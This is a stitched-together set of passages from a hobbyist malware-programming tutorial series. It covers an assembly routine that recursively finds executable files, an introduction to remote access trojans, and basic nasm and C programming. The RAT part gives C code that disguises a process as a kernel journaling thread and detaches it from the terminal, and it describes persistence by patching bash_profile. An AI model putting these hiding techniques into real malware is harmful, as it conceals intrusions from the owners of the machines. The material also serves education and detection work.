lea rsi, [rdi] ; Par2 : name 329 | mov rdi, [RBP - FD] ; Par1 : fd 330 | lea rdx, [RBP - ST] ; Par3 : struct stat 331 | xor rcx, rcx ; Par4 : flags 332 | call mfw_newfstatat 333 | 334 | test al,al 335 | js next ; Silently skip this file on error. Likely Permission denied 336 | 337 | ;; Check if it is a directory 338 | mov eax, DWORD [rdx + ST_MODE] 339 | and eax, 0q0170000 340 | cmp eax, 0q0040000 341 | jz scan_folder ; If it is a directory... scan recursively 342 | cmp eax, 0q0100000 343 | jnz next ; If it is not a regular file.... skip it 344 | 345 | ;; If we got a regular file then let's check permissions 346 | mov eax, DWORD [rdx + ST_MODE] 347 | and eax, 0q00111 ; Execution permisions 348 | jz next ; If no execution permision set... skip the file 349 | jmp run_payload ; Otherwise run the payload on it 350 | 351 | scan_folder: 352 | ;; Before the recursive call we need to store current state in the stack 353 | ;; File descruptor and getents are already there. We just store the registers 354 | ;; This way, we only use the memory when scanning a subfolder 355 | push r8 ; Current getdents buffer 356 | push r9 ; Number of bytes in getents buffer 357 | push r14 ; Current getendts buffer ofsset 358 | 359 | call mfw_select_target ; RDI and RSI already set to the right parameters 360 | ;; Restore evertything and keep going 361 | pop r14 ; PUSH/POP are 2 bytes long... mov reg, [bp-XX] is 4 362 | pop r9 363 | pop r8 364 | jmp next ; Continue 365 | 366 | run_payload: 367 | ;; For the time being just print file name 368 | mov rdi, rsi 369 | call mfw_putln 370 | 371 | next: 372 | movzx rdx, WORD [r8 + r14 + D_RECLEN] ; Get Record len | Same size thqan mov 373 | add r14,rdx 374 | cmp r14, r9 375 | jge loop0 ; If it is zero, get more data 376 | jmp loop1 377 | 378 | done: 379 | ;; Close directory 380 | mov rdi, QWORD [rbp-FD] 381 | call mfw_close 382 | done1: 383 | leave ; Set RSP=RBP and pops RBP 384 | ret 385 | 386 | ``` 387 | 388 | # Conclusions 389 | As I said this was very short, we already know a lot of assembler and system programming to code this part so this was just work we had to do. We took the chance to talk a little bit about number representation, and we got a recursive function working in assembly... which is not that hard once we learned what that involves in the previous instalments. 390 | 391 | For the next instalment we should start looking into some payload.... I envision a first theoretical instalment to introduce the related concepts before jumping in to the code.... 392 | 393 | So, now it is time for you to decide: 394 | 395 | [poll type=regular results=always chartType=bar] 396 | * VIRUS 397 | * RANSOMWARE 398 | * SPYWARE 399 | * RAT 400 | [/poll] 401 | 402 | 403 | ## Read the whole series here 404 | [Part IX. Finding Files in asm](https://0x00sec.org/t/programming-for-wanabes-ix-finding-files-in-asm/25794) 405 | [Part VIII, File Details](https://0x00sec.org/t/programming-for-wanabes-viii-file-details/25738) 406 | [Part VII. Finding files](https://0x00sec.org/t/programming-for-wanabes-vii-finding-files-i/25662) 407 | [Part VI. Malware Introduction](https://0x00sec.org/t/programming-for-wannabes-part-vi-malware-introduction/25595) 408 | [Part V. A dropper](https://0x00sec.org/t/programming-for-wannabes-part-v-a-dropper/23090) 409 | [Part IV. The stack](https://0x00sec.org/t/programming-for-wannabes-part-iv/22421) 410 | [Part III. Your first Shell Code](https://0x00sec.org/t/programming-for-wannabees-part-iii-your-first-shell-code/1279) 411 | [Part II and a Half. Part II for ARM and MIPS](https://0x00sec.org/t/programming-for-wannabes-part-ii-and-a-half/1196) 412 | [Part II. Shrinking your program](https://0x00sec.org/t/programming-for-wannabes-part-ii/1164) 413 | [Part I. Getting Started](https://0x00sec.org/t/programming-for-wannabes-part-i/1143) 414 | -------------------------------------------------------------------------------- /part-11.md: -------------------------------------------------------------------------------- 1 | # Programming for Wanabes XI. Introduction to RATs 2 | So my 0x00sec fellows've spoken and RATs will be. As anticipated in this first instalment we will mostly discuss theoretical concepts, which means not much code.... but will be some :). Let's start. 3 | 4 | RAT stand for `Remote Access Trojan`, actually the last `T` could also be _Tool_ instead of _Trojan_ and then we will be talking about common tools used in corporate environments instead of malware. Conceptually both things do the same, i.e. allow a third party to remotely access and control a computer. Or if you prefer, they allow to break the privacy of people. The difference is that in some case there is some official and even legal support to install and run the tool and in the other... no. In any case, and most of the time, the users do not have a clue of what is going on :). 5 | 6 | # RAT's functionality 7 | The ultimate goal of a RAT is provide root shell access to the machine (or Administrator access if you prefer). Right, a _Backdoor_ is, somehow, the simplest form of a RAT. It is true that many RATs provide specific functions like capturing video or audio, steal credentials, etc... however all these actions are pretty straight forward whenever you have privileged access to the machine. Or in other words, when you are able to upload and run any SW you want. 8 | 9 | So, I will keep aside specific task to perform in the victim as the one mentioned above for the time being, and get focused on the actual core of the RAT: enabling remote access. For doing this, we need the following: 10 | 11 | * Remote Shell Access (execute specific commands is a kind of subset of this) 12 | * Secure communication with a third party. That third-party will usually be a C2C application controlled by the attacker. This implies general data interchange (commands and responses but also file transfers in both directions) 13 | 14 | We will look into this again in the context of this course, but I have already written about this in [here](https://0x00sec.org/t/remote-shells-part-i/269), [here](https://0x00sec.org/t/remote-shells-part-ii-crypt-your-link/306), [here](https://0x00sec.org/t/remote-shells-part-iii-shell-access-your-phone/508) and [here](https://0x00sec.org/t/remote-shells-part-iv-the-invisible-remote-shell/743)... 15 | 16 | On top of that, and I said on top, because what come next are orthogonal functions in the sense that they are used by many other types of malware and not specifically for RATs: 17 | 18 | * Privilege Escalation. 19 | * Hiding 20 | * Network Pivoting (Optional) 21 | * Persistence (Optional) 22 | 23 | ## Privilege Escalation 24 | This is a two-manifold topic. In one hand, it is common to have enumeration utilities available in the RAT infrastructure (either as part of the RAT or as a module that can be downloaded in the victim) to help the attacker get an administrator account. 25 | 26 | Imagine that the RAT got executed using some Social Engineering technique. In such a case, it will likely be executed as an unprivileged user, and the attacker will try to escalate that situation in order to have full access to the machine. 27 | 28 | On the other hand, the enumeration tools just provides the information about potential vulnerabilities in the machine. Then appropriated exploits are required in order to make those vulnerabilities into advantages to escalate user privileges. 29 | 30 | Note that, some times the RAT gets executed already using a vulnerability (either local or remote) that gives it superuser privileges from time zero. In those cases the enumeration functions are just taking space and are not useful... Well, not exactly... What does this mean is that this kind of malware many times have a module/plug-in subsystem to enable the activation (and alternative download from the C2C) of functions when needed. Such a system in a malware context may be a bit complex, as sometimes you cannot just use standard functions provided by the system. 31 | 32 | ## Hiding 33 | Other function that most RAT implement is some kind of hiding capabilities. There are a few options on how to do this, depending on how secure is the target system. 34 | 35 | * __Hide on-sight__. On low-security systems sometimes it is just enough to give the RAT a cryptic-system-like name to make it invisible. Imagine the machine of a regular user that has just being compromised, for instance, to be used in a proxy chain or to become a zombie in a Botnet. You can just call your RAT something like `[kworker/u12:7]` and not even an advanced user may pay attention to it. 36 | * __Install a rootkit__. Supposing the attacker has got root access to the machine s/he would easily install a rootkit to hide all tracks related to the RAT. Note that on a decently hardened machine kernel module loading would likely be disabled and run-time kernel patching may not be possible so maybe a user-space rootkit may be the only alternative. 37 | * __Insert the RAT in a running process__. In this case, the RAT get itself copied in a running process and executed inside it, usually as a thread. This is a pretty stealth technique. For instance, imagine a Firefox that is already running, you will see firefox connections to many different server (supposing you have a hundred tab open as everybody does), together with the connection to the C2C machine. The basis of this is briefly described [here](https://0x00sec.org/t/running-binaries-without-leaving-tracks/2166). This technique also requires superuser permissions and makes persistence a bit tricky. 38 | 39 | ## Network Pivoting 40 | This is an optional feature. It is common for RATs targeting cooperative environments where it is relatively easy (using social engineer for instance) to get into a machine with limited privileged from outside the network, and then reach internal machines, not accessible from the Internet, just jumping from different servers within the network. Sometimes the RAT offers a kind of proxy/router capability to connect the C2C to those internal machines. 41 | 42 | Network pivoting can actually be seeing as a special case of privilege escalation, where the privileges are rising by accessing machines that may have access to services that other machines may not. 43 | 44 | I bet all of you know what I'm talking about, but just in case. Imagine a web application. The front-end (all those pages and Javascripts) is accessible from the internet, but the back-end, the machine with the database and all the business logic is not, it only can be accessed from inside the target network. 45 | 46 | As I said, network pivoting is a kind of systematic approach consisting on enumerating nearby computers accessible from the current compromised machine, determining any vulnerability or weak configuration, and then accessing it copying the RAT over and executing it there and effectively starting the process again from that machine. 47 | 48 | Imagine for instance a machine in a corporate network. It has internet access, but the user also has access to some laboratory machines from that computer using SSH. Imagine that the user has configured ssh passwordless, what is pretty common specially when you need to access many machines remotely... Then we will have direct access to that machine for free... 49 | 50 | ## Persistence 51 | 52 | Finally, this functionality is also optional and depends on the nature of the attack. As mentioned before in this course, persistence is the capability of a malware to keep executing despite of being stopped for whatever reason (usually a reboot). 53 | 54 | In general, a RAT will like to have some persistence mechanism, so the access to the machine is not lost after a reboot, or whenever the process dies for whatever reason. Persistence, usually implies writing something somewhere in the disk... because the disk is the memory on the computer that will survive reboots (if by a chance the target have other persistent storage, that would also be an option, think about flash memory in embedded platforms).... And not just that, further disk modifications are required in order to execute again that SW saved in that persistent memory. 55 | 56 | Very advanced RAT targeting network environments, just act like a virus/worms. They have the capability to infect other machines so, after an initial attack enough machines in the network will be infected to ensure that after rebooting any of them, there will be some instance of the malware running in the network that will infect again that machine. This is a very smart and powerful technique as the attacker is not storing anything on the disk at the same time that it achieves persistence... Anyhow, as you can see, this will not work on all cases and it targets a very specific environment. 57 | 58 | # Let's write a RAT: r4t0x0 59 | 60 | Our first RAT is going to be damn simple, but it is going to be a complete/real RAT. Let's go for the following: 61 | 62 | * Hide on-sight 63 | * Basic Persistence 64 | * Remote shell 65 | 66 | If we recall our original malware skeleton, the two first features have to be implemented in the `init` function. 67 | 68 | _Note: In this instalment we will just drop the code on `main` as it will be just a few lines._ 69 | 70 | For persistence we will be going low profile, just store the file on the home folder of the user looking like a configuration file and silently patch `bash_profile` to launch it on each user session. A more sophisticated RAT could, for instance, determine the actual shell being used and patch the appropriate start-up files or look for a folder in the home directory containing many files so the RAT will be more stealth. 71 | 72 | As I said we are going to keep it simple. The point of this exercise is that you understand how this works so, you will be able to extend the program to test any other technique you want to learn about or experiment with. Once you understand the basics you will be in the position to analyse different protection systems and start to try to figure out how to overcome... and then how to modify the protection system to detect you RAT, and then break it again,... and so forth. Lots of fun ahead. 73 | 74 | Finally, the `remote shell` will be our main `payload`. In this case, as we mentioned in the [malware introduction](https://0x00sec.org/t/programming-for-wannabes-part-vi-malware-introduction/), RATs runs on an interactive loop, so there is no target selection function to feed the payload. 75 | 76 | We will be going through the different features of the RAT one by one from scratch, so you will see a _possible_ process on how to determine what is the issue you want to solve and how to solve it step by step until you reach your goal. As it happens with many other problems in real life, the key point is to get to know what is the problem you want to solve... this seems pretty trivial, but many times people lost the point and end up overcomplicating things that doesn't really add to the solution of the problem. Anyhow, I hope the approach we are going to follow will help you not only to write malware or tools to detect malware, but to solve problems in general... That is the important thing to learn. 77 | 78 | Let's get started with the first point. 79 | 80 | # Hiding on-sight 81 | Our goal here is to keep the RAT low profile and avoid it to be detected. As we discussed in the introduction sometimes just changing your name and being quiet will be more than enough to go unnoticed. 82 | 83 | The easiest way is to give the process the name of some system thread. Not even an advanced user will be able to spot the RAT on `ps` or `top` at first (or any other tools actually). However... your program has to be properly coded and be efficient otherwise... seen something that looks like a system thread taking 100% of the CPU, and popping on top of `top` all the time.... well, that will be suspicious. And then it is just a matter of time to get discovered. 84 | 85 | Let's see how all this works. We will be using `ps`, but most monitoring tools work the same, actually reading data from `/proc/PID`. 86 | 87 | You can now run a `ps -ax` on your system an take a look to what you get. You can also install different distros on VMs and check differences between distros and kernels to chose a name that fits well in more platforms. These are some examples I get from an Ubuntu machine: 88 | 89 | 10 ? S 0:00 [migration/0] 90 | 13 ? S 0:00 [cpuhp/1] 91 | 14 ? S 0:03 [watchdog/1] 92 | 22 ? S 0:04 [ksoftirqd/2] 93 | 24 ? I< 0:00 [kworker/2:0H] 94 | 46 ? S 0:01 [ksoftirqd/6] 95 | 48 ? I< 0:00 [kworker/6:0H] 96 | 358 ? S 0:27 [jbd2/sda5-8] 97 | 991 ? S 1:01 [jbd2/sda6-8] 98 | 2189 ? S 0:00 [nfsd] 99 | 2190 ? S 0:00 [nfsd] 100 | 2191 ? S 0:00 [nfsd] 101 | 102 | There are many more options, just take a look on your own system. 103 | 104 | User space programs are more susceptible to be noticed by the user/administrator, but, for instance in the example above, you can see a few threads of the kernel NFS server running... They all look the same, so it is likely that nobody will notice an extra line like those (except for the sequential PIDs)... However not everybody runs an NFS server... the `kworker` option sounds better but process status is `I`. That means it is a kernel `Idle` task that I believe is an state we cannot reach from user space... But I haven't researched this. Let me know in the comments if you can get that. 105 | 106 | The `jdb2` is the _Journaling Block Device_ basically will be there whenever you use a file system with journaling capabilities like `ext3` or `ext4` common on GNU/Linux boxes. This appears with an `S` status that means, _Sleeping_ and that is what our RAT will do most of the time, so, let's go for this one. 107 | 108 | We will change the process name, but we will also try to mimic the other columns values. A normal user will not notice those but a system administrator will and may find them suspicious, so we better are methodical. When we are done with this you will find a funny coincidence... 109 | 110 | ## Changing a process name 111 | Let's first take a look to how does a normal process looks like. Let's compile this simple program that just go into sleep mode waiting for some user input (that is what `getchar` does... gets a char): 112 | 113 | ```C 114 | #include 115 | #include 116 | 117 | int main (int argc, char *argv[]) { 118 | printf ("This is RAT0X0 version 0.1\n"); 119 | getchar (); 120 | } 121 | ``` 122 | 123 | Now, let's compile and run it and on a different terminal let's see how `ps` sees this simple process: 124 | 125 | $ ps -ax | grep rat 126 | (...) 127 | 23022 pts/24 S+ 0:00 ./rat0x0-01 128 | 129 | That doesn't look promising. We could already change the name to `jbd2SOMETHING` on the disk before running the program but that will be suspicious and unlikely to be executed by a user.... We should assume that the program will have an arbitrary name. 130 | 131 | The simplest way to change the name is to overwrite the `argv[0]` parameter that is actually the file name of the program being executed: 132 | 133 | ```C 134 | #include 135 | #include 136 | 137 | int main (int argc, char *argv[]) { 138 | printf ("This is RAT0X0 version 0.1\n"); 139 | strcpy (argv[0],"[Jbd2/sda0-8]"); 140 | getchar (); 141 | } 142 | 143 | ``` 144 | 145 | > Note: In principle your target name shall have the same length or less than the original one so it will fit in the current assigned memory. Otherwise you will need to shuffle around the stack to make room for the extra characters... 146 | 147 | Let's try: 148 | 149 | $ ps -ax | grep rat 150 | (...) 151 | 23431 pts/39 S+ 0:00 grep rat 152 | 153 | No trace of `rat0x0`. Let's see how this new `jbd2` looks like: 154 | 155 | $ ps -ax | grep bd2 156 | 358 ? S 0:27 [jbd2/sda5-8] 157 | 991 ? S 1:01 [jbd2/sda6-8] 158 | 23371 pts/24 S+ 0:00 [Jbd2/sda0-8] 159 | 160 | I have just add a capital `J` to easily identify the process during development (you will have to kill it a few times). Note that `sda0` is not a valid partition name so it should be safe... alternatively you could also swap the `b` and the `d` in the name and use a valid partition name... Well, you can try different options to chose a name that will be unnoticeable, at least at first glance... 161 | 162 | However note than, when people suspect that there is something doggy going on, they will start looking on the details and sooner than later this will be uncover... As I said this is the most simplistic way to hide your RAT. And it works as far as nothing suspicious happens. 163 | 164 | Anyhow, our process still shows a PTY (that means it is associated to a terminal) and also there is a `+` after the `S` that indicated that it is in the foreground. 165 | 166 | # Going background 167 | What comes next is basically the process you follow to code a classical daemon. Yes, no hacker/malware developer black magic... just good old system programming. When writing a daemon you need to disconnect the process of any terminal, session and process group so the process doesn't get terminated unexpectedly. You do a couple things more, but that is the very minimum to become a `daemon Let's go step by step. 168 | 169 | First, let's go background. 170 | 171 | The way to achieve this is to `fork` and kill our parent. All this process management things always sounds funny when explained with words :). When we `fork`, we create a new process that is an exact copy of the original one. The only difference between the father and the child is that, after `fork` the PID of the child is returned to the father and 0 is returned to the child. Both process continuing execution in the line just after `fork` in the program. Usually the father process creates a child to do something and get some result, so it will have to eventually wait for the process to finish and for that it needs the PID (well, it is better to know it). The child doesn't need that, and can get its PID at any time just calling `getpid()`. No it won't know its parent. Our powerful `rat0x0` will look like this now 172 | 173 | ```C 174 | #include 175 | #include 176 | #include 177 | 178 | int main (int argc, char *argv[]) { 179 | printf ("This is RAT0X0 version 0.1\n"); 180 | strcpy (argv[0],"[Jbd2/sda0-8]"); 181 | pid_t pid = fork(); 182 | if (pid!=0) return 0; 183 | 184 | while (1) usleep (1000); 185 | } 186 | ``` 187 | 188 | As you can see we just create a new copy of ourselves using `fork` and then we kill the parent (the one that received a PID different of 0). I have also removed the `getchar` because we are trying to get our process disconnected from the terminal and that is a function that uses `stdin`. 189 | 190 | If we run this process, `ps` will show now this: 191 | 192 | $ ps -ax | grep bd2 193 | 358 ? S 0:27 [jbd2/sda5-8] 194 | 991 ? S 1:01 [jbd2/sda6-8] 195 | 26956 pts/24 S 0:00 [Jbd2/sda0-8] 196 | 197 | Great... We have got rid of the `+`... But we still have an associated terminal to our process. 198 | 199 | # Getting rid of the terminal 200 | The way to release the terminal associated to the process is to actually leave the current session. I'm not going to go into the details about session and process groups here. In simple words, you start a session when you log-in. Any process you create after that belongs to the session. This allows the system to know which process to kill when the session is closed by the user. Did you ever wonder how the OS magically know what to kill if you just leave your session? 201 | 202 | Daemons, and also our cute RAT do not want to get killed when the user closes the session from which they were started... well, daemons are usually started by the system at start up, but just in case you start one of them manually in a terminal. The way to do this is to create a new session for our process. And we do this with the `setsid` system call: 203 | 204 | ```C 205 | #include 206 | #include 207 | #include 208 | 209 | int main (int argc, char *argv[]) { 210 | printf ("This is RAT0X0 version 0.1\n"); 211 | strcpy (argv[0],"[Jbd2/sda0-8]"); 212 | pid_t pid = fork(); 213 | if (pid!=0) return 0; 214 | setsid (); 215 | while (1) usleep (1000); 216 | } 217 | ``` 218 | 219 | Now we can compile and check again: 220 | 221 | $ ps -ax | grep bd2 222 | 358 ? S 0:27 [jbd2/sda5-8] 223 | 991 ? S 1:01 [jbd2/sda6-8] 224 | 27496 ? Ss 0:00 [Jbd2/sda0-8] 225 | 226 | 227 | Damn, what is that `s` that just popped up? 228 | 229 | # Stop being a Process Leader 230 | If you read the man page for `setsid` it says: 231 | 232 | > setsid() creates a new session if the calling process is not a process group leader. The calling process is the leader of the new session (i.e., its session ID is made the same as its process ID). The calling process also becomes the process group leader of a new process group in the session (i.e., its process group ID is made the same as its process ID). 233 | 234 | Also you can check the man page for `ps` to veryfy what does the `s` means in its output. 235 | 236 | Done?... There you go... That is what and where the `s` is/comes from. So, to stop being a session leader for this session, we have to... `fork` again. 237 | 238 | ```C 239 | #include 240 | #include 241 | #include 242 | 243 | int main (int argc, char *argv[]) { 244 | pid_t pid; 245 | printf ("This is RAT0X0 version 0.1\n"); 246 | strcpy (argv[0],"[Jbd2/sda0-8]"); 247 | if ((pid = fork()) != 0) return 0; 248 | setsid(); // Remove TTY 249 | if ((pid = fork()) != 0) return 0; 250 | 251 | while (1) usleep (1000); 252 | } 253 | 254 | ``` 255 | 256 | $ ps -ax | grep bd2 257 | 358 ? S 0:27 [jbd2/sda5-8] 258 | 991 ? S 1:01 [jbd2/sda6-8] 259 | 27742 ? S 0:00 [Jbd2/sda0-8] 260 | 261 | And there you go.... Same fingerprint than the kernel processes.... Well, the PID is way higher... Nobody is perfect. 262 | 263 | > PIDs are reused when the maximal PID number is reached. This value is defined at `/proc/sys/kernel/pid_max` and usually is 32768... So you can start forking and exiting process until you get a pid below 1000/2000... Haven't tried this but it should work... Just do not fork to fast or you will look like a fork bomb 264 | 265 | The code above is pretty simple and you should be able to code the assembler version by yourself. Just add the two new system calls in the `mfw.asm` file and do a couple comparisons and conditional jumps. If you do not want to do it yourself and you have any issue, be free to ask and , in any case, I will add the code in a later instalment anyway. 266 | 267 | # Conclusion 268 | In this instalment we have gone quickly through the main features of a RAT and after that we have defined a simple one to use as example in the comming instalments. It has very few features so we can keep it simple while we learn more about our system. So far we have learn how to manipulate the way the process is shown for system tools like `ps` and `top`... and at the same time, accidentaly :), we have learn how to convert any program in a `daemon`. So far, `rat0x0` just looks like a regular system daemon... nothing really special about it. That is the key of a good RAT... just look normal. 269 | 270 | 271 | -------------------------------------------------------------------------------- /part-02.md: -------------------------------------------------------------------------------- 1 | # Programming for Wannabes. Part II 2 | 3 | Glad to see you have come back to this humble course. Hope you are eager to get a lot more stuff to digest. Grab some coffee and relax. 4 | 5 | I have been claiming that this course is going to be different to all those that you find over the Internet. Right now, I should introduce a whole bunch of boring things (numeric representation, addressing modes, instructions groups,...) and guess what?... I won't do that. 6 | 7 | In order to avoid going through all that boring stuff and to try to follow a learn-by-example approach, we need to be able to build programs. In the previous part we've got a glimpse on that, but we cannot yet produce a executable out of some assembly code. 8 | 9 | Furthermore, in the previous part we started looking to the HW to help us introduce some concepts. In this part, we are going to look a bit to the upper layers and how they lay one over the other. 10 | 11 | Finally, you need to know that we are going to use `nasm` in this course. This is a very well-know and powerful assembler that will help us to produce machine code out of our assembly code. So, before you keep reading, go and install it! 12 | 13 | # Our First Assembly Program 14 | So, let's start with the simplest, Linux OS-compliant program we can write. There you go: 15 | 16 | ```nasm 17 | global _start 18 | _start: mov rdi, 10 19 | mov rbx, 20 20 | 21 | add rdi,rbx 22 | 23 | mov rax, 0x3c 24 | syscall 25 | ``` 26 | 27 | Well, the central part of the program should look familiar to you by now. We are using different registers in this case, but we are again adding two numbers. There are two main differences with respect to our previous example: 28 | 29 | - First, we are defining a symbol that will be `global` and will mark up the first instruction of our program. That is the `_start`. Try to remove the `global` declaration and you will get an error when you try to compile it saying that the `_start` symbol cannot be found. 30 | - We have two new instructions at the very end. We will explain these in detail in a sec, but first let's compile and run the program to check that we are good to go. 31 | 32 | Let's compile our program: 33 | 34 | $ nasm -f elf64 -o c2-1.o c2-1.asm 35 | $ ld -o c2-0s c2-1.o 36 | $ ./c2-0s; echo $? 37 | 30 38 | 39 | Very good. We have built an executable out of our assembly source code and when we run it, the program returns the result of our operation. I believe this is the simplest ASM program you can actually write that does something. Yep, the bash variable `$?` contains the return value of the last executed command. Try to change the numbers in the ASM file, recompile and check that the `$?` will contain the sum. 40 | 41 | So.... we have something to start to work with.... and a lot of things to explain. 42 | 43 | # Producing and Executable 44 | Let's start from the last step. The generation of the binary. To produce a program out of an ASM source code, we will have to convert it into machine code and then convert it into a program that can be executed by a given OS. Some times we do this in just one step, but it is actually two separated stages. 45 | 46 | As you should know by now, we are working with Linux. The default executable format is ELF. We are writing 64bits ASM, so we will tell our assembler that we need some object code (that's the name for those .o files you obtain from your assembler or compiler) in a specific format. In this case `elf64`. We use the command-line flag `-f` to specify that. The `-o` stands for _output_ and let us indicate the file were we want the result stored. Then we just append the list of source files to assemble. 47 | 48 | Using the right format for our object code, is important, because that will allow us to use all other standard tools in the system. One of those tools is the linker. 49 | 50 | Let's look to the standard process of producing an executable: 51 | 52 | - The **source code** (in any language) is converted to **object code**. This is done by the compiler. An assembler can be seen as a compiler for assembly code. 53 | - The **object code** is not directly executable. it needs to be converted into an application, and this task is done by the linker. In our case we have one single object file but, in general, an application is composed of multiple object files (coming from different source code files), static libraries, dynamic libraries, etc... The linker is the program that _links_ all those pieces together, and it does this in a way that the OS can make sense out of it. 54 | 55 | In this simple case we are invoking the linker (`ld`) and we are instructing it to produce a executable named `c2-0s` (the `-o` flag again) out of a single object file. In general, the compiler is able to invoke the linker under the hood, and that is why you can produce a binary out of your source code invoking `gcc`... but be aware that, to do that, `gcc` is actually calling other programs, including the linker `ld`. 56 | 57 | We will be using the assembler and the linker continuously. Do not worry if you haven't fully grasp the idea. You'll do as we go. For now, if you haven't fully understand this, just keep in mind that you have to use `nasm` to compile your ASM code, and `ld`, to produce an executable out of it. 58 | 59 | # System Calls 60 | At the beginning I said that we will be dealing with the other layers in our simplified SW model (OS, standard library,..). We have just seen that we need to produce our executable in a format that the OS can understand. But we have to interact with the OS. 61 | 62 | For our simple example, our interaction with the OS consists on returning a value that we've calculate inside our program whenever our program executing ends and returns control to the calling process (usually `bash` the command-line interpreter). If we keep the value in a register inside our program there is no way to let anybody else know about it. 63 | 64 | So, in order to interact with the OS we have to use a system call (**syscall**). The operating system offers some services to the applications running on it. This services are accessible using these system calls. Opening files, mapping memory, reading directory contents,... all these actions requires interaction with the hardware (the hard drive, the memory management unit, the file system driver -ok, this one is not HW :)-,...) and are managed by the OS. 65 | 66 | In the last two lines of our program we are actually using one of those services. The system call we are using is `SYS_EXIT`, that finishes the process returning a value to the calling process. 67 | 68 | System calls are identified by a number, and the number for the `exit` syscall is `0x3c`. As you can see, in order to access a system call in a x86/64bits processor, we have to do 3 things (actually you can only see, explicitly, two of them in our example). 69 | 70 | 1. Load the system call number in the `rax` register. 71 | 2. Load other required parameters in other registers. This we are not doing directly 72 | 3. Use the `syscall` instruction to jump into kernel mode. 73 | 74 | Yes, system calls are executed by the kernel (the OS), so what we basically do, is to put some values in some registers and then give control to the OS. The way to do that is platform-dependent. The `syscall` we used above is the standard way to invoke a system call on a x86 64bits. For 32 bits you usually invoke the software interruption 0x80 (`int 0x80`). 75 | 76 | Let's reproduce the last lines of our program here again: 77 | 78 | ```nasm 79 | add rdi,rbx 80 | mov rax, 0x3c 81 | syscall 82 | ``` 83 | 84 | We can clearly identify how we set `rax` with the value `0x3c` (the `exit` system call). We can also clearly identify how we give control to the kernel using the mnemonic `syscall`. But what is not clear is how do we pass the result of our operation to the `exit` call so the `$?` bash variable gets actually modified. 85 | 86 | Well, for the `exit` system call, the `rdi` register have to be set with the value we want our program to return. That is why we have done the addition directly on the `rdi` register, so we do not have to explicitly set it before calling our system calls. Reordering the source code: 87 | 88 | ```nasm 89 | mov rax, 0x3c 90 | add rdi, rbx ====> exit (a+b) 91 | syscall 92 | ``` 93 | 94 | In this link you can find a list of system calls and the registers that you should use to pass parameters to them. 95 | 96 | http://blog.rchapman.org/posts/Linux_System_Call_Table_for_x86_64/ 97 | 98 | # Getting our Function to Work 99 | Now, we completely understand our assembly code, and we also know how to produce an executable out of it. The last piece in the puzzle is how the compiler+linker know that they have to run the code marked with the `_start` label. 100 | 101 | In order to understand this, we are going to move into C and try to reproduce our assembly program. The same program in C would look like this: 102 | 103 | ```C 104 | #include 105 | 106 | int main (void) 107 | { 108 | int a = 10; 109 | int b = 20; 110 | 111 | a = a + b; 112 | _exit (a); 113 | } 114 | ``` 115 | 116 | So, in C, things are a bit different. Once compiled, whenever we run our program it will start executing whatever we write in the `main` function. This is how the language was defined. The code inside the `main` function, declares two integer variables (two integer numbers), adds them and then calls a function called `_exit`, passing as parameter the result of the sum. 117 | 118 | This is pretty much the same thing we have done in ASM some paragraphs above, but using the C programming language. Yes, we removed the `register` keyword here, the compiler will not honour it in the `main` function directly, so, let's forget about it for now. 119 | 120 | Let's now go line by line for the less experienced readers. Advanced readers can safely skip the next sections 121 | 122 | ## First Line 123 | The first line found in the program is: 124 | 125 | ```C 126 | #include 127 | ``` 128 | 129 | This line is a pre-processor directive. Anything starting with a `#` in a C program is a pre-processor directive. This directives are instruction to a program called `cpp`. This program is run before the actual compilation and it effectively modifies our source code in different ways before it is compiled. 130 | 131 | > NOTE: Old compilers requires the directive pre-processor be placed at column 0. If you get a weird error message and everything looks fine, try to put your pre-processor directives at the beginning of the line 132 | 133 | In this case, the `#include` directive, as you can imagine, includes the indicated file at that position in the source code. Not sure what does this mean?. OK, no problem. Let's see what the pre-processor will produce for our program: 134 | 135 | 136 | $ cpp c2-1.c | less 137 | 138 | Now take a look to `unistd.h`... it is located in the system include folder: 139 | 140 | $ more /usr/include/unistd.h 141 | 142 | Well, that was not a great idea. This file has a lot more pre-processor directives... some that we have not used yet. However, I hope you get the idea. The content of `unistd.h` is included at the `#include` location in our source code... and any other pre-processor directives in that file are processed recursively. 143 | 144 | Actually, for our simple C program we just need one line (in fact we not even need that, but let's be legal); the prototype of the `_exit` function. If you look for it in the output of the pre-processor you will find something like this: 145 | 146 | ```C 147 | extern void _exit (int __status) __attribute__ ((__noreturn__)); 148 | ``` 149 | 150 | That is the unique line we really need. We will describe in detail what a prototype is and how to use them later in this course. For the time being, you just need to know, that, in order to be able to use a function that is defined outside our C source code, we have to provide the definition for that function... (this is not the complete history but it is enough for now). In general, what we need to tell the compiler is the return type and number and types of parameters... but we haven't talked about types yet... just keep in mind that you need to tell the computer how the function you want to call looks like and you do that with a function prototype. 151 | 152 | ## The `main` function 153 | The next line in our C program is the `main` function. As we have already said, this is the function that gets executed whenever we launch our program. The `main` function is usually declared in two different ways. 154 | 155 | The second one is the one we used in this example. Whenever you are not interested on command-line parameters, you can declare `main` as a function that returns an integer (`int`) and does not receive any parameter (`void`). 156 | 157 | However, you usually want to access command-line parameters provided by the user. In those cases, the `main` function is declared as: 158 | 159 | ```C 160 | int main (int argc, char &argv[]) 161 | ``` 162 | 163 | You can change `argc` and `argv` for whatever identifiers you want. However those are the names universally used for the `main` function parameters. 164 | 165 | The first argument `argc` is an integer that indicates the number of command-line parameters the user has provided when launching the application. The `argv` is an array of strings. One string for each space separated parameter provided by the user (unless you quote the parameters). Again, we will talk about this later. Right now, we just need to now that `main` is the function that gets first executed and it can be declared in, at least, two different ways... 166 | 167 | ## The `_exit()` Function Call 168 | 169 | The body of the function should be clear by now, so it is only the last line that needs some explanation. The last line is a function call... you will recognize that by the parenthesis. In this case, the `_exit` function is a wrapper around the `exit` system call, provided by the standard C library. Here we see clearly how the standard C library lays on top of the operating system interface, and gives us a simpler interface to access the functions provided by the OS. 170 | 171 | To my knowledge, there is no standard way to directly access system calls from a C program without using the standard C library. Apparently the old `_syscall` function is deprecated and it is, anyway, a function from the standard C library. 172 | 173 | In a normal C program, you will usually see the `exit` function to exit a program, instead of the `_exit` that we are using. The first one is a higher level version defined in `stdlib.h` (the standard library header) instead of the, slightly lower level versiondefined in the `unistd.h` (UNIX standard include). Check the man page for `_exit` to know about the differences. 174 | 175 | In short, `_exit` is the closest we can get to the `SYS_exit` system call from C... it does a couple things less than the standard `exit`. OK, nevermind... we are going to get rid of it anyway pretty soon. 176 | 177 | # Wait a Second... 178 | So...when I write a C program, my program starts running at `main`, but when I write an ASM program, it starts running at `_start`?... why? 179 | 180 | That is a good question. Actually, that is not true. In both cases the function/code that gets executed at the very beginning is the one pointed by `_start`. However, a 